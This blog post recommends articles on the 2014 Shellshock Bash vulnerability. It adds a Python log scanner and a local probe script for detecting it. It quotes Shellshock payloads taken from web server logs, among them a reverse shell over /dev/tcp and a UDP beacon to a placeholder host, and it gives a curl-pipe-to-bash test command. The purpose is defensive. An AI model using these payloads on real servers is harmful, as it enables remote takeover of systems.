Monday, March 30, 2015

5 Articles to Learn about Shellshock Bash Bug


2014 is shaping up to be the year of the biggest software bugs and vulnerabilities. Earlier this year the internet was bleeding from the Heartbleed vulnerability, and now it has been shocked by the ShellShock bug. To me it looks even bigger than Heartbleed, simply because it is a bug in the Bash shell, our own Bash shell, the most popular of all the UNIX shells, ahead of the C and Korn shells. Given that most of the servers in investment banks, insurance companies, cloud providers and e-commerce are Linux servers with Bash as the most used shell, the impact is very large. I am sure people on the Microsoft stack are smiling somewhere :), but wait, read the full article.

First details of the ShellShock bug emerged on Wednesday last week, and since then it has gone viral, both online and offline. People are busy talking about it and engineers are busy patching servers, computers, routers, firewalls and other computing resources that run vulnerable versions of Bash. It has triggered patching almost everywhere. I am sure many of my readers are still puzzling over what this ShellShock bug is. For those, it's an example of an arbitrary code execution (ACE) vulnerability, which means an attacker can execute their own code on your vulnerable server. What does this mean to you? Well, if they can execute their own commands they can do anything to your server and your business. To start with, they can stop your servers, delete files, steal passwords and take complete control of the machine, operating it remotely. Typically, arbitrary code execution attacks are very sophisticated and require an expert understanding of the internals of code execution, memory layout and assembly language, which makes them very hard to pull off. Thanks to the Bash ShellShock bug, even a novice programmer can now launch such a powerful attack and take control of a vulnerable server. To give you an example, due to the ShellShock vulnerability, anyone can take control of your web server by simply sending an HTTP request.
This is massive, but fortunately the impact is limited to servers where a server-side program passes user-supplied input to the Bash shell; if your Java server doesn't do that, you are probably safe from this path of attack.

By the way, if you were on vacation last week somewhere in the countryside without any internet access and know nothing about the ShellShock bug in the Bash shell, here is a list of 5 articles which will tell you everything about the ShellShock Bash bug, from what it is to how hackers are exploiting this vulnerability and celebrating an early Christmas. There are even sites and tools to check whether your server is vulnerable to ShellShock. You can use the website listed last to test whether your system is vulnerable, and also learn how to patch the vulnerability so you are no longer at risk of attack.


Articles to Understand Bash ShellShock Bug

Inside Shellshock: How hackers are using it to exploit systems (https://blog.cloudflare.com/inside-shellshock/)
This is one of the best articles I have read on ShellShock, and I suggest that everyone read it first before reading the others. Cloudflare has done a very good job of explaining the ShellShock bug in simple words. By reading it you will learn how a magic string, () { :; };, can hand control of your server to a hacker sitting miles away. Cloudflare was not only quick to patch their servers and protect their customers' interests, but also quick to educate people about this massive vulnerability. It goes well with their business too, because they claim to block threats and stop abusive bots and crawlers from wasting their customers' bandwidth and server resources. There is one more reason why I connect with this article: it uses an example to show how a hacker can use an innocuous-looking HTTP request to exploit the ShellShock vulnerability of the Bash shell. Cloudflare has also put in place WAF rules to block the ShellShock exploit, and here are some of the common patterns of this bug that emerged from their log files:
 
() { :;}; /bin/ping -c 1 198.x.x.x;
() { :;}; echo shellshock-scan > /dev/udp/example.com/1234
() { ignored;};/bin/bash -i >& /dev/tcp/104.x.x.x/80 0>&1

You can breathe a sigh of relief if you are a Cloudflare customer, but you can also use these patterns to check whether something like this is happening on your own web server. Thanks to John Graham-Cumming for his excellent work. So what are you waiting for? Go read this article before it's too late.
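To make those log patterns actionable, here is an added example (my own code, not Cloudflare's WAF rule or anything from the article) of a small Python scanner that reads Apache combined-format access log lines, looks for a value that begins with the Bash function-definition prefix () { in the Referer or User-Agent field, pulls out the command that follows the closing brace, and tags it by the kind of callback it attempts. The log lines are constructed, using RFC 5737 documentation addresses in place of the real ones the article redacted, and the payloads are the three patterns quoted above. The signature is anchored to the start of the header value because an unpatched bash only imported a function when the value began with () {; the last sample line shows why that anchoring matters for false positives.

```python
import re
from dataclasses import dataclass

# Constructed sample access log (Apache "combined" format: the Referer and
# User-Agent are the last two quoted fields). Addresses are RFC 5737
# documentation ranges, not real hosts.
SAMPLE_LOG = """\
203.0.113.5 - - [25/Sep/2014:10:01:12 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :;}; /bin/ping -c 1 198.51.100.7"
198.51.100.2 - - [25/Sep/2014:10:02:03 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.0.113.9 - - [25/Sep/2014:10:03:44 +0000] "GET /cgi-bin/env.sh HTTP/1.1" 200 64 "-" "() { :;}; echo shellshock-scan > /dev/udp/example.com/1234"
192.0.2.17 - - [25/Sep/2014:10:05:10 +0000] "GET /cgi-bin/env.sh HTTP/1.1" 200 64 "() { ignored;};/bin/bash -i >& /dev/tcp/192.0.2.17/80 0>&1" "curl/7.37.0"
192.0.2.20 - - [25/Sep/2014:10:06:00 +0000] "GET /about.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (compatible; () { not a shell; })"
"""

# Combined log format; only the fields we need are named.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Anchored at the start of the field: a function definition "() { ... }"
# followed by whatever trailing command the attacker appended.
SHELLSHOCK_RE = re.compile(r"^\s*\(\s*\)\s*\{(?P<body>.*?)\}\s*;?\s*(?P<trailer>.*)$")


@dataclass
class Finding:
    client_ip: str
    field: str        # which header carried the payload
    command: str      # the command appended after the function body
    tag: str          # coarse classification of what the command tries to do


def classify(command: str) -> str:
    """Tag the appended command by the behaviour seen in the article's patterns."""
    if "bash -i" in command or "sh -i" in command:
        return "interactive-shell"
    if "/dev/tcp/" in command or "/dev/udp/" in command:
        return "network-beacon"
    if "ping" in command:
        return "icmp-beacon"
    return "other"


def scan_line(line: str) -> list:
    """Return a Finding for each header field of one log line that carries a payload."""
    m = LOG_RE.match(line)
    if not m:
        return []
    findings = []
    for field in ("referer", "agent"):
        hit = SHELLSHOCK_RE.match(m.group(field))
        if hit:
            cmd = hit.group("trailer").strip()
            findings.append(Finding(m.group("ip"), field, cmd, classify(cmd)))
    return findings


def scan_log(text: str) -> list:
    """Scan every line of an access log and collect all findings."""
    findings = []
    for line in text.splitlines():
        findings.extend(scan_line(line))
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f.client_ip:<14} {f.field:<8} {f.tag:<18} {f.command}")
```

Running it against the constructed log reports three hits and ignores the fifth line, whose User-Agent merely contains () { in the middle of the string. A loosened, unanchored pattern is what a WAF would use to be safe against encoding tricks, but for log review the anchored form keeps the noise down.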


Everything you need to know about the ShellShock Bash bug (http://www.troyhunt.com/2014/09/everything-you-need-to-know-about.html)
Troy Hunt is a Microsoft Most Valuable Professional (MVP) for Developer Security, and earlier this year he shared similar information on the infamous Heartbleed bug. Troy has done an excellent job of putting together something definitive that lets people separate the hype from the true underlying risk. Starting from what the Bash shell is and why you need it, Troy explains what the actual bug is and what the potential ramifications are. It's not all thrills; there are facts too, such as which versions of Bash are affected, when the world first learned about the ShellShock bug, and how long it has been at risk. He has also analysed how the Microsoft stack can be vulnerable to ShellShock, given that Bash is mostly a UNIX shell and people might laugh at the idea. The best part of the article is what you can do about it: he explains the next steps from both the system administrator's and the consumer's perspective. In short, this article is true to its title: everything you need to know about the ShellShock Bash bug.


Shellshock DHCP Remote Code Execution – Proof of Concept (https://www.trustedsec.com/september-2014/shellshock-dhcp-rce-proof-concept/)
This is one of the earlier articles on the ShellShock bug this week, written by Geoff Walton, Senior Security Consultant at TrustedSec. It gives you a step-by-step guide to how ShellShock can be exploited through any DHCP string value. I think one of the things this PoC did really well was show the result for the end user. Most people aren't going to know what any of this means until they read a more straightforward explanation in layman's terms of what it means for the average Internet user, and that's why the first article in this list is my pick as the best post for understanding the ShellShock bug.


Bash 'shellshock' bug is wormable (http://blog.erratasec.com/2014/09/bash-shellshock-bug-is-wormable.html)  
Robert Graham ran some early scans to gauge the impact of this bug. Early results from his scan show how many systems are vulnerable just on port 80, just on the root "/" URL, without a Host field. He makes an excellent point about how CGI scripts can be vulnerable if they call out to bash, no matter how indirectly. He also mentions that embedded web servers on odd ports are the real danger, and that not just web servers but other services like DHCP are vulnerable to this bug.
(Image: Impact of Bash ShellShock Bug on Internet)



Bash 'shellshock' scan of the Internet (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)
This is the original scan Robert Graham did, the one discussed in the previous article. Malware is now using his User-Agent string, pretending to be his known scan. Robert ran his scan by stuffing a bunch of "ping home" commands into various CGI variables, just to see how widespread this Bash bug is, but it was enough to cause minor panic among many webmasters. Although the scan found only a few thousand systems (because it was intentionally limited), it shows the real potential of the ShellShock bug.
(Image: ShellShock vulnerability of Bash Shell Scanning)


Shellshock BASH Vulnerability Tester (https://shellshocker.net/)
This site was developed by the health IT team at Medical Informatics Engineering. They have shared what they learned about the ShellShock vulnerability and what they did to protect their infrastructure. The site is a good place to learn about the ShellShock bug and avoid getting "shellshocked". Many people have contributed simple commands to test whether your server is vulnerable to the ShellShock bug. For example, you can simply run the one-liner below to find out if you're vulnerable:
curl https://shellshocker.net/shellshock_test.sh | bash
If you want to test each exploit (CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, CVE-2014-6278) individually without running the script above, they also have a step-by-step guide for doing so. You can also find a couple of posts about ShellShock exploits in the real world by following the links there.
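For a local check that does not pipe a remote script into bash, here is an added example (my own code, not shellshocker.net's test script) in Python that runs the widely used probe for CVE-2014-6271: export a variable whose value is a function definition followed by an extra command, start bash, and see whether the extra command ran. It covers only that original CVE, not the follow-up CVEs listed above; the canary string, the helper names and the "unknown" result for a host without bash are my own choices.

```python
import os
import shutil
import subprocess

# Constructed canary: if bash runs the command appended to the imported
# function definition, this string shows up on stdout.
CANARY = "shellshock-canary-8f3a"


def run_env_function_probe(bash_path: str = "bash"):
    """Run the CVE-2014-6271 environment-function probe against a local bash
    binary and return its stdout, or None if no such binary is on PATH."""
    resolved = shutil.which(bash_path)
    if resolved is None:
        return None
    env = {
        "PATH": os.environ.get("PATH", "/usr/bin:/bin"),
        # An unpatched bash parses this value as a function definition and
        # keeps going, executing "echo <CANARY>" while importing it.
        # A patched bash treats it as an ordinary string variable.
        "x": "() { :;}; echo " + CANARY,
    }
    completed = subprocess.run(
        [resolved, "-c", "echo probe-done"],
        env=env,
        capture_output=True,
        text=True,
        timeout=10,
    )
    return completed.stdout


def interpret(output) -> str:
    """Turn the probe's stdout into a verdict: vulnerable, patched or unknown."""
    if output is None:
        return "unknown"
    return "vulnerable" if CANARY in output else "patched"


if __name__ == "__main__":
    print(interpret(run_env_function_probe()))
```

Keeping the interpretation separate from the subprocess call means the verdict logic can be tested on fixed strings, while the probe itself runs against whichever bash the host actually has. A "patched" result here only says the first CVE is closed; use the individual tests on the site above for the others.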

In short, ShellShock is a vulnerability in GNU's Bash shell that lets attackers run remote commands on a vulnerable system. If your system has not updated Bash since Tue Sep 30 2014: 1:32PM EST, you're most definitely vulnerable and have been since first boot. This security vulnerability affects versions 1.14 (released in 1994) through the most recent version, 4.3, according to NVD. If you host your web server with any of the major cloud providers, chances are it has been patched by now. If you work in a big organization, you might already have noticed a sudden surge in patching of UNIX servers. I have not yet heard of any incident due to the Bash ShellShock bug that resulted in loss of information, and hopefully servers will be patched before it's too late.
